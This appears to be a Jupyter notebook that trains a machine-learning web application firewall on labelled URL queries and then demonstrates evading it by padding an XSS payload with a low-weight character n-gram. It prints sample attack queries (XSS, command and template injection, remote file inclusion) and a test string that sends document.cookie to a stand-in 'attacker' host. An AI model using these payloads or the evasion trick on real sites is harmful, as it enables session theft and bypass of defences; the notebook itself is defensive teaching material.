# Machine Learning WAF - Web Application Firewall
* https://github.com/faizann24/Fwaf-Machine-Learning-driven-Web-Application-Firewall
* https://github.com/oreilly-mlsec/book-resources/tree/master/chapter8/waf

In [2]:
import os, urllib.parse, pickle
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn import metrics

import matplotlib.pyplot as plt

In [3]:
def loadFile(name):
    directory = str(os.getcwd())
    filepath = os.path.join(directory, name)
    with open(filepath, 'r', encoding='utf-8') as f:
        data = f.readlines()
    data = list(set(data))
    result = []
    for d in data:
        d = str(urllib.parse.unquote(d))   #converting url encoded data to simple string
        result.append(d)
    return result

In [18]:
!wget -U "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" https://raw.githubusercontent.com/infosecdemos/ml-2020/master/mlsec.net/python-waf/badqueries.txt -O badqueries.txt

badQueries = loadFile('badqueries.txt')
badQueries[:10]

--2020-09-18 10:45:13--  https://raw.githubusercontent.com/infosecdemos/ml-2020/master/mlsec.net/python-waf/badqueries.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3326796 (3.2M) [text/plain]
Saving to: ‘badqueries.txt.1’


2020-09-18 10:45:13 (11.6 MB/s) - ‘badqueries.txt.1’ saved [3326796/3326796]



['/hydrocodone-prescriptions/\n',
 '/examples/jsp/cal/index.php?cat_select=<script>foo</script>\n',
 '/sablonlar/gunaysoft/gunaysoft.php?sayfaid=XXpathXX\n',
 '${exec(print(`echo UVBBNB\necho $((5+32))\necho UVBBNB\necho UVBBNB`);UVBBNB\n',
 '/apavxugx.php?<script>document.cookie="testdnbh=5237;"</script>\n',
 '/scripts/qcvjnagy16kc.cfm\n',
 '/help.php?q="del q65533214&rem \n',
 '/scriptpath/index.php?page=http://192.168.202.118:8080/2aibfaczmac8?\n',
 '/main.php?stuff="&del\\x0cq99279396&rem\\x0c\n',
 '/javascript/usr.exe\n']

In [19]:
!wget -U "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" https://raw.githubusercontent.com/infosecdemos/ml-2020/master/mlsec.net/python-waf/goodqueries.txt -O goodqueries.txt

validQueries = loadFile('goodqueries.txt')
validQueries[:10]

--2020-09-18 10:45:44--  https://raw.githubusercontent.com/infosecdemos/ml-2020/master/mlsec.net/python-waf/goodqueries.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22769423 (22M) [text/plain]
Saving to: ‘goodqueries.txt’


2020-09-18 10:45:45 (32.3 MB/s) - ‘goodqueries.txt’ saved [22769423/22769423]



['/q_21605941/\n',
 '/p735497-errorhandler/\n',
 '/229107/\n',
 '/javascript/index_1.vb\n',
 '/trans_news/\n',
 '/872622/\n',
 '/company_hd/\n',
 '/saintmanager_announcement/\n',
 '/javascript/hourly.c\n',
 '/t12540/\n']

In [20]:
badQueries = list(set(badQueries))
validQueries = list(set(validQueries))
allQueries = badQueries + validQueries

In [21]:
yBad = [1 for i in range(0, len(badQueries))]  #labels, 1 for malicious and 0 for clean
yGood = [0 for i in range(0, len(validQueries))]
y = yBad + yGood
queries = allQueries

In [22]:
vectorizer = TfidfVectorizer(min_df = 0.0, analyzer="char", sublinear_tf=True, ngram_range=(1,3)) # converting data to vectors
X = vectorizer.fit_transform(queries)

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42) # splitting data

badCount = len(badQueries)
validCount = len(validQueries)

lgs = LogisticRegression(class_weight={1: 2 * validCount / badCount, 0: 1.0}) # class_weight='balanced')
lgs.fit(X_train, y_train) # training our model

STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.

Increase the number of iterations (max_iter) or scale the data as shown in:
    https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
    https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression


LogisticRegression(C=1.0, class_weight={0: 1.0, 1: 56.856822060540736},
                   dual=False, fit_intercept=True, intercept_scaling=1,
                   l1_ratio=None, max_iter=100, multi_class='auto', n_jobs=None,
                   penalty='l2', random_state=None, solver='lbfgs', tol=0.0001,
                   verbose=0, warm_start=False)

## Pickle model

In [23]:
!wget -U "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" https://raw.githubusercontent.com/infosecdemos/ml-2020/master/mlsec.net/python-waf/trained_waf_model -O trained_waf_model

p = Pipeline([
        ('vectorizer', vectorizer),
        ('classifier', lgs)
    ])

pickle.dump(p, open('trained_waf_model', 'wb'))

--2020-09-18 10:49:32--  https://raw.githubusercontent.com/infosecdemos/ml-2020/master/mlsec.net/python-waf/trained_waf_model
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6260137 (6.0M) [application/octet-stream]
Saving to: ‘trained_waf_model’


2020-09-18 10:49:33 (15.0 MB/s) - ‘trained_waf_model’ saved [6260137/6260137]



## Evaluation

In [24]:
predicted = lgs.predict(X_test)

fpr, tpr, _ = metrics.roc_curve(y_test, (lgs.predict_proba(X_test)[:, 1]))
auc = metrics.auc(fpr, tpr)

print("Bad samples: %d" % badCount)
print("Good samples: %d" % validCount)
print("Baseline Constant negative: %.6f" % (validCount / (validCount + badCount)))
print("------------")
print("Accuracy: %f" % lgs.score(X_test, y_test))  #checking the accuracy
print("Precision: %f" % metrics.precision_score(y_test, predicted))
print("Recall: %f" % metrics.recall_score(y_test, predicted))
print("F1-Score: %f" % metrics.f1_score(y_test, predicted))
print("AUC: %f" % auc)

Bad samples: 44532
Good samples: 1265974
Baseline Constant negative: 0.966019
------------
Accuracy: 0.999454
Precision: 0.985726
Recall: 0.998179
F1-Score: 0.991913
AUC: 0.999947


## Use pretrained model

In [25]:
p = pickle.load(open('trained_waf_model', 'rb'))

In [26]:
input_data = [
    '<script></script>',
    'hello.us',
    'www.google.com',
    "<script>window.location='http://attacker/?cookie='+document.cookie</script>"
]

pred = p.predict_proba(input_data).tolist()

for i in range(len(pred)):
    print("{:0.2f}%\tmalicious:\t{}".format(pred[i][1]*100, input_data[i]))

100.00%	malicious:	<script></script>
2.45%	malicious:	hello.us
3.36%	malicious:	www.google.com
100.00%	malicious:	<script>window.location='http://attacker/?cookie='+document.cookie</script>


## Binary classifier evasion

In [27]:
vars(p)

{'memory': None,
 'steps': [('vectorizer',
   TfidfVectorizer(analyzer='char', binary=False, decode_error='strict',
                   dtype=<class 'numpy.float64'>, encoding='utf-8',
                   input='content', lowercase=True, max_df=1.0, max_features=None,
                   min_df=0.0, ngram_range=(1, 3), norm='l2', preprocessor=None,
                   smooth_idf=True, stop_words=None, strip_accents=None,
                   sublinear_tf=True, token_pattern='(?u)\\b\\w\\w+\\b',
                   tokenizer=None, use_idf=True, vocabulary=None)),
  ('classifier',
   LogisticRegression(C=1.0, class_weight={0: 1.0, 1: 56.856822060540736},
                      dual=False, fit_intercept=True, intercept_scaling=1,
                      l1_ratio=None, max_iter=100, multi_class='auto', n_jobs=None,
                      penalty='l2', random_state=None, solver='lbfgs', tol=0.0001,
                      verbose=0, warm_start=False))],
 'verbose': False}

In [28]:
vec = p.steps[0][1]
clf = p.steps[1][1]

In [29]:
print(vec.idf_)

[ 9.88191796 13.29416517 13.98731235 ... 14.39277746 14.39277746
 14.39277746]


In [30]:
print(clf.coef_)

[[5.15163752e+00 3.08659016e-02 2.43210958e-03 ... 1.09267797e-04
  1.09267797e-04 1.09267797e-04]]


In [31]:
term_influence = vec.idf_ * clf.coef_
print(term_influence)

[[5.09080593e+01 4.10336394e-01 3.40186763e-02 ... 1.57266709e-03
  1.57266709e-03 1.57266709e-03]]


In [32]:
print(np.argpartition(term_influence, 1))

[[81937 83662     2 ... 97829 97830 97831]]


In [33]:
vec.vocabulary_

{'/': 10522,
 'h': 55125,
 'y': 92321,
 'd': 45818,
 'r': 76641,
 'o': 70279,
 'c': 43527,
 'n': 67925,
 'e': 48183,
 '-': 8262,
 'p': 72543,
 's': 79024,
 'i': 57223,
 't': 81489,
 '\n': 154,
 '/h': 11876,
 'hy': 57118,
 'yd': 93281,
 'dr': 47696,
 'ro': 78387,
 'oc': 71215,
 'co': 45180,
 'od': 71269,
 'do': 47547,
 'on': 71801,
 'ne': 69117,
 'e-': 48480,
 '-p': 9431,
 'pr': 74306,
 're': 77834,
 'es': 50324,
 'sc': 80190,
 'cr': 45330,
 'ri': 78053,
 'ip': 58842,
 'pt': 74414,
 'ti': 83135,
 'io': 58787,
 'ns': 69848,
 's/': 79373,
 '/\n': 10528,
 '/hy': 11919,
 'hyd': 57144,
 'ydr': 93319,
 'dro': 47735,
 'roc': 78416,
 'oco': 71257,
 'cod': 45208,
 'odo': 71312,
 'don': 47586,
 'one': 71847,
 'ne-': 69130,
 'e-p': 48511,
 '-pr': 9464,
 'pre': 74335,
 'res': 77888,
 'esc': 50361,
 'scr': 80235,
 'cri': 45365,
 'rip': 78100,
 'ipt': 58892,
 'pti': 74464,
 'tio': 83174,
 'ion': 58828,
 'ons': 71861,
 'ns/': 69860,
 's/\n': 79374,
 '|': 96441,
 '$': 3487,
 'f': 50796,
 'w': 88122,
 '

In [34]:
# First, we create a token vocabulary dictionary so that
# we can access tokens by index.
vocab = dict([(v,k) for k,v in vec.vocabulary_.items()])

In [35]:
term_idx = np.argpartition(term_influence, 1)[0][0]

In [36]:
print(vocab[term_idx])

t/s


In [37]:
payload = "<script>alert(1)</script>"

In [38]:
p.predict([payload])[0]

1

In [39]:
p.predict_proba([payload])[0]

array([2.66398015e-11, 1.00000000e+00])

In [40]:
p.predict_proba([payload + '/' + vocab[term_idx]])[0]

array([7.87289400e-09, 9.99999992e-01])

In [41]:
# Find the multiplier value at which the classifier will start making errors
multiplier = 100

In [42]:
p.predict_proba([payload + '/' + vocab[term_idx]*multiplier])[0]

array([0.2679046, 0.7320954])

In [43]:
p.predict([payload + '/' + vocab[term_idx]*multiplier])[0]

1

In [44]:
print(payload + '/' + vocab[term_idx]*multiplier)

<script>alert(1)</script>/t/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/st/s
